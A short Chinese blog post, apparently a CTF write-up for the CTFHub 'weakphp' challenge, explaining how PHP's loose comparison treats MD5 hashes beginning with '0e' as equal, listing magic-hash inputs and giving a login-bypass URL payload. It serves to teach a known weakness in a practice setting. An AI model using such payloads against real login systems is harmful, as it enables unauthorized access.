欢迎您访问 最编程 本站为您分享编程语言代码,编程技术文章!
您现在的位置是: 首页

CTFHub 2017 - 赛客夏令营 - Web weakphp (git泄漏和MD5绕过) - 方法2: MD5绕过

最编程 2024-02-03 22:13:53
...

PHP在处理哈希字符串时,它把每一个以“0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以“0E”开头的,那么PHP将会认为他们相同,都是0。

以下值在md5加密后以0E开头:

QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a

payload

/index.php?user=QNKCDZO&pass=240610708